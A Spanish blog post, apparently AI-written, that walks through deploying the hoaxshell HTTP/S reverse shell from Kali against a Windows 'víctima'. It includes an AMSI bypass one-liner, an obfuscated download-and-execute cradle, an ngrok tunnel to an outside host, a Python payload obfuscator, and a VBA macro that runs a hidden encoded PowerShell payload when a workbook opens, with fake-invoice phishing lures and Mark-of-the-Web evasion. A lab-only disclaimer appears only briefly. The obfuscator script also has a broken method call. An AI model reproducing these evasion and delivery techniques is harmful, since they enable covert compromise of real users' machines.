Hoaxshell: Reverse Shell Evasivo en Kali

https://www.onlinetis.com

Hoaxshell: Reverse Shell Evasivo en Kali

Entiendo que estás buscando información sobre hoaxshell en Kali Linux. Es una herramienta que ha ganado mucha popularidad en el ámbito del Pentesting debido a su efectividad para evadir soluciones de seguridad tradicionales.

Aquí te explico qué es, cómo funciona y cómo puedes empezar a probarla.

¿Qué es hoaxshell?

Hoaxshell es un framework de reverse shell (concha inversa) poco convencional que utiliza el protocolo HTTP/S. A diferencia de las shells tradicionales que abren una conexión directa (y que son fácilmente detectadas por firewalls o antivirus), hoaxshell simula tráfico web legítimo, lo que la hace muy difícil de detectar para muchos EDR (Endpoint Detection and Response).

¿Por qué es especial?

  • Evasión: Está diseñada específicamente para saltarse Windows Defender y otros sistemas de monitoreo.

  • Tráfico Cifrado: Puede utilizar túneles SSL para ocultar el contenido de los comandos.

  • Sin Binarios: Generalmente se ejecuta mediante un "one-liner" de PowerShell, por lo que no necesita subir archivos .exe sospechosos a la víctima.

Cómo instalarlo en Kali Linux

Para usarlo, necesitas tener Python 3 y Git instalados en tu máquina Kali.

  1. Clona el repositorio:

    Bash
    git clone https://github.com/t3l3m4k0/hoaxshell

  2. Entra al directorio:

    Bash
    cd hoaxshell

  3. Instala las dependencias:

    Bash
    pip3 install -r requirements.txt

  4. Dale permisos de ejecución:

    Bash
    chmod +x hoaxshell.py

Modo de Uso Básico

El funcionamiento de hoaxshell se divide en dos partes: el servidor (tu Kali) y el payload (la víctima).

1. Iniciar el servidor de escucha

Ejecuta el siguiente comando para generar un payload y poner a Kali a la espera:

Bash
python3 hoaxshell.py -s <Tu_IP_de_Kali>

2. Ejecutar en la víctima

Al ejecutar el comando anterior, hoaxshell imprimirá en tu pantalla un código largo de PowerShell. Debes copiar ese código y ejecutarlo en la terminal de la máquina Windows objetivo.

Nota: En un escenario real de Pentesting, este código se inyectaría a través de otras vulnerabilidades (como un archivo malicioso, macros o rubber ducky).

Recomendaciones de Seguridad

  • Entorno controlado: No uses esta herramienta en redes que no te pertenezcan. Es ideal para laboratorios de TryHackMe, HackTheBox o auditorías autorizadas.

  • Uso de HTTPS: Para una mayor evasión, utiliza el parámetro -cert para emplear certificados SSL, ya que el tráfico HTTP en texto plano es más fácil de analizar por un IPS (Intrusion Prevention System).

Configurar hoaxshell a través de un túnel HTTPS es el estándar de oro para la evasión, ya que cifra el tráfico entre tu Kali y la víctima, impidiendo que los sistemas de inspección de red (como un IDS) vean los comandos que envías en texto plano.

Para usar HTTPS, hoaxshell necesita un certificado SSL. Aquí te explico cómo generarlo y activarlo.

1. Generar un certificado auto-firmado

Si no tienes un certificado oficial, puedes crear uno rápido en Kali usando openssl. Esto generará una "llave" y un "certificado" válidos para la sesión:

Bash
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes

Durante el proceso, puedes dejar los campos en blanco o rellenarlos con datos ficticios.

2. Ejecutar hoaxshell con cifrado

Una vez que tengas los archivos key.pem y cert.pem en la carpeta de la herramienta, inicia el servidor indicando que use HTTPS:

Bash
python3 hoaxshell.py -s <Tu_IP_de_Kali> -c cert.pem -k key.pem

¿Qué cambia al usar HTTPS?

  1. Cifrado: Todo el tráfico viaja bajo el puerto 443 (por defecto) o el que elijas, mezclándose con el tráfico web normal.

  2. Payload: El comando de PowerShell que genera hoaxshell será distinto; incluirá instrucciones para ignorar errores de certificados (ya que el tuyo es auto-firmado y no de una entidad oficial como DigiCert).

  3. Evasión de Deep Packet Inspection (DPI): Los firewalls de próxima generación no podrán leer el contenido de los paquetes sin romper el túnel SSL.

3. Uso con Túneles Externos (Ngrok / LocalXpose)

Si tu Kali está detrás de un router (NAT) y quieres atacar una máquina fuera de tu red local, puedes usar un túnel para exponer tu puerto:

  1. Inicia un túnel HTTP/S (ejemplo con Ngrok): ngrok http 443.

  2. Copia la URL que te da Ngrok (ej. https://1a2b-3c4d.ngrok.io).

  3. Ejecuta hoaxshell usando esa URL como servidor:

    Bash
    python3 hoaxshell.py -s 1a2b-3c4d.ngrok.io -p 443

Dato importante: Al usar HTTPS auto-firmado, hoaxshell añade una línea en el payload de PowerShell: [System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}. Esto es lo que permite que la víctima confíe en tu certificado "falso".

La ofuscación es el paso final para que hoaxshell sea verdaderamente efectivo. Aunque el tráfico esté cifrado por HTTPS, el código de PowerShell que se ejecuta en la víctima puede ser detectado por AMSI (Antimalware Scan Interface) si reconoce patrones de comandos comunes.

Aquí tienes tres niveles de ofuscación que puedes aplicar:

1. Ofuscación Manual Básica (Variables y Comillas)

PowerShell permite romper palabras clave usando comillas o cambiando el orden de las variables. Windows Defender busca cadenas como Invoke-Expression o New-Object.

Ejemplo de cambio:

  • Original: IEX (New-Object Net.WebClient).DownloadString('...')

  • Ofuscado: & ( 'I'+'EX' ) ( & ( 'New-Ob'+'ject' ) Net.WebClient ).DownloadString('...')

2. Uso de herramientas de ofuscación (Recomendado)

Para no hacerlo a mano, existen herramientas automáticas que transforman el código en algo ilegible para los humanos y difícil de analizar para los antivirus.

Chimera

Es un script en Shell que utiliza sustitución de variables y fragmentación de strings.

  1. Clona el repo: git clone https://github.com/tokyoneon/Chimera

  2. Pasa tu payload de hoaxshell por el script para generar una versión "sucia".

PyFuscation / Invoke-Obfuscation

Si prefieres algo más avanzado, Invoke-Obfuscation es el estándar de la industria. Permite comprimir el código, cambiar el encoding a Hexadecimal o incluso esconderlo dentro de comentarios.

3. El truco del "Bypass de AMSI"

Incluso con el código ofuscado, a veces el antivirus detecta la intención del script al ejecutarse en memoria. Para evitarlo, muchos pentesters ejecutan un pequeño fragmento de código antes del payload de hoaxshell para "desactivar" o parchear AMSI en la sesión actual:

PowerShell
# Este es un ejemplo de una sola línea para corromper AMSI en memoria:
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)

Cómo aplicar todo junto:

  1. Generas el payload en hoaxshell con HTTPS.

  2. Copias el código de PowerShell generado.

  3. Lo pasas por una herramienta de ofuscación o le aplicas el bypass de AMSI arriba mencionado.

  4. Lo ejecutas en la víctima.

Advertencia: La ofuscación no es infalible. Los EDR modernos (como CrowdStrike o SentinelOne) analizan el comportamiento (behavioral analysis). Si ven que PowerShell intenta conectar a una IP extraña de repente, podrían alertar incluso si el código es ilegible.

¡Manos a la obra! Vamos a crear un script sencillo en Python que tome tu payload de hoaxshell y le aplique técnicas de ofuscación básicas como reemplazo de variables, concatenación de strings y codificación en Base64.

Este script transformará un comando reconocible en una cadena de texto que parece basura para un analista humano y para algunos escáneres estáticos.

Script: ofuscador_hoax.py

Copia este código en un archivo dentro de tu Kali:

Python
import base64
import random
import string

def generar_nombre_aleatorio(longitud=6):
    return ''.join(random.choice(string.ascii_lowercase) for _ in range(longitud))

def ofuscar_payload(payload):
    # 1. Reemplazos de palabras clave comunes para engañar a firmas simples
    payload = payload.replace("Net.WebClient", f"('{ 'Net.' + 'Web' + 'Client' }')")
    payload = payload.set_replace("Invoke-Expression", "IEX")
    
    # 2. Codificación en Base64 (El truco clásico de PowerShell)
    payload_bytes = payload.encode('utf-16le')
    payload_b64 = base64.b64encode(payload_bytes).decode()
    
    # 3. Construir el "wrapper" ofuscado
    var_name = generar_nombre_aleatorio()
    payload_final = f"${var_name} = '{payload_b64}'; powershell -e ${var_name}"
    
    return payload_final

if __name__ == "__main__":
    print("--- Ofuscador Básico para Hoaxshell ---")
    original = input("Pega aquí el payload de PowerShell generado por hoaxshell: ")
    resultado = ofuscar_payload(original)
    
    print("\n--- PAYLOAD OFUSCADO ---")
    print(resultado)
    print("\n-------------------------")

Cómo usarlo:

  1. Genera tu payload normalmente con hoaxshell (usando HTTPS como vimos antes).

  2. Ejecuta el script de Python: python3 ofuscador_hoax.py.

  3. Pega el código largo que te dio hoaxshell cuando te lo pida.

  4. Copia el resultado y úsalo en la máquina víctima.

¿Por qué funciona esto?

  • Codificación UTF-16LE + Base64: PowerShell tiene un parámetro nativo -EncodedCommand (o -e) que acepta comandos en Base64. Esto oculta el contenido real del script a simple vista.

  • Nombres aleatorios: Al usar $var_name con caracteres aleatorios, evitas que los sistemas de seguridad busquen nombres de variables sospechosos fijos.

  • Concatenación: Dividir Net.WebClient en pedazos evita que los antivirus encuentren esa cadena de texto exacta en el script.

Siguiente paso recomendado

Si ves que incluso con esto Windows Defender lo detecta, el problema suele ser la IP de destino. A veces, los antivirus marcan como "maliciosa" cualquier conexión saliente de PowerShell hacia una IP pública desconocida.

Usar una macro de Excel (VBA) es una de las técnicas de ingeniería social más clásicas y efectivas. El objetivo es que la víctima abra un documento aparentemente inofensivo y, al hacer clic en "Habilitar contenido", se ejecute tu payload de hoaxshell en segundo plano.

Aquí tienes cómo preparar un archivo de Excel malicioso (para fines educativos en tu laboratorio):

1. El código de la Macro (VBA)

Para que la macro sea sigilosa, utilizaremos la función Shell de VBA de forma que abra una ventana de PowerShell oculta (vbHide).

  1. Abre Excel y crea un libro nuevo.

  2. Presiona ALT + F11 para abrir el editor de Visual Basic for Applications.

  3. Ve a Insertar > Módulo.

  4. Pega el siguiente código (sustituye el texto marcado por tu payload ofuscado):

VBA
Sub Workbook_Open()
    ' Llamamos a la función cuando se abre el archivo
    EjecutarPayload
End Sub

Sub EjecutarPayload()
    Dim payload As String
    Dim shellObj As Object
    
    ' Pega aquí tu payload ofuscado (el que generamos con el script de Python)
    payload = "powershell.exe -WindowStyle Hidden -e <TU_CODIGO_BASE64_AQUÍ>"
    
    ' Ejecutamos el comando de forma invisible
    Set shellObj = CreateObject("WScript.Shell")
    shellObj.Run payload, 0, False
End Sub

2. Preparación del archivo

Para que esto funcione, el archivo debe guardarse con una extensión que soporte macros:

  • Archivo (.xlsm): Libro de Excel habilitado para macros.

  • Archivo (.xlsb): Libro binario de Excel (más difícil de analizar para algunos antivirus).

El gancho (Ingeniería Social)

Un documento en blanco no convence a nadie. Debes añadir contenido que justifique por qué el usuario debe "Habilitar macros":

  • Usa una plantilla de "Factura Pendiente" o "Reporte de Nómina".

  • Añade una imagen borrosa o un mensaje que diga: "Este documento está protegido. Para visualizar el contenido, haga clic en 'Habilitar edición' y luego en 'Habilitar contenido' en la barra superior".

3. Evasión de detecciones

Los antivirus modernos escanean el código VBA en busca de palabras como Shell, CreateObject o WScript. Para mejorar la evasión, puedes:

  1. Fragmentar strings: En lugar de WScript.Shell, usa "WScrip" & "t.Sh" & "ell".

  2. Uso de variables: No pongas el payload directamente en el código; puedes esconderlo en una celda oculta de la hoja de cálculo (por ejemplo, en la celda Z100 con texto blanco) y hacer que la macro lo lea desde allí.

VBA
' Ejemplo leyendo desde una celda
payload = Sheets("Hoja1").Range("Z100").Value

4. Limitaciones importantes

  • MotW (Mark of the Web): Si descargas el archivo de internet, Windows le pone una "marca" que bloquea las macros automáticamente por seguridad. Para saltar esto en un laboratorio, el archivo suele entregarse dentro de un archivo .ISO o .ZIP protegido con contraseña.

  • Versiones de Office: Las versiones más recientes de Microsoft 365 son muy estrictas con las macros de fuentes externas.

Location: España

Entradas populares de este blog

Hacking y ciberseguridad en kali linux con Fping

Imagen
  www.onlinetis.com   Hacking y ciberseguridad en kali linux con Fping Fping es un programa similar a ping que utiliza la solicitud de eco del Protocolo de Mensajes de Control de Internet (ICMP) para determinar si un host objetivo responde. fping se diferencia de ping en que permite especificar cualquier número de objetivos en la línea de comandos o un archivo con las listas de objetivos a los que se hará ping. En lugar de enviar a un objetivo hasta que se agote el tiempo de espera o responda, fping envía un paquete de ping y pasa al siguiente objetivo mediante un sistema de turnos rotatorios. Como instalar:  sudo apt install fping fping Enviar paquetes ICMP ECHO_REQUEST a los hosts de la red   fping6 Compatibilidad con versiones anteriores de fping anteriores a la versión 4.0 El comando fping en Kali Linux es una utilidad de red que se utiliza para enviar paquetes de ICMP (Protocolo de mensajes de control de Internet) a varios hosts de forma simultánea. A diferen...
LEER MAS »

Hacking y ciberseguridad en kali linux con atk6-thcping6

Imagen
www.onlinetis.com Hacking y ciberseguridad en kali linux con atk6-thcping6 Parece que estás interesado en usar atk6-thcping6 en Kali Linux. Esta herramienta es parte del conjunto de utilidades thc-ipv6 , diseñado para probar las debilidades del protocolo IPv6. Para usar atk6-thcping6 , primero necesitas tener instalado el paquete thc-ipv6 . En la mayoría de las distribuciones de Kali, ya viene preinstalado, pero si no, puedes instalarlo con el siguiente comando: Bash sudo apt install thc-ipv6 Una vez que lo tienes instalado, la sintaxis básica para atk6-thcping6 es: Bash atk6-thcping6 <interface> <target> [opciones] Aquí está el desglose de los argumentos y opciones más comunes: <interface> : La interfaz de red que usarás para enviar el paquete. Por ejemplo, eth0 , wlan0 , etc. <target> : La dirección IPv6 del objetivo al que quieres hacer ping. [opciones] : Puedes usar varias opciones para modificar el comportamiento del ping. La mejor manera de ver todas la...
LEER MAS »

Como utilizar Fierce en kali linux

Imagen
  www.onlinetis.com   Como utilizar Fierce en kali linux Fierce es un escáner semiligero que ayuda a localizar direcciones IP no contiguas y nombres de host en dominios específicos. Está pensado como precursor de nmap, unicornscan, nessus, nikto, etc., ya que todos ellos requieren que se conozca previamente el espacio IP buscado. No realiza exploits ni escanea internet indiscriminadamente. Está diseñado específicamente para localizar objetivos probables tanto dentro como fuera de una red corporativa. Dado que utiliza principalmente DNS, es frecuente encontrar redes mal configuradas que filtran el espacio de direcciones interno. Esto es especialmente útil en malware dirigido. Originalmente escrito por RSnake y otros en http://ha.ckers.org/. Se trata simplemente de una conversión a Python 3 para simplificar y modernizar el código base. Como instalar: sudo apt install fierce Escáner DNS que ayuda a localizar espacios de IP no contiguos y nombres de host contra dominios específico...
LEER MAS »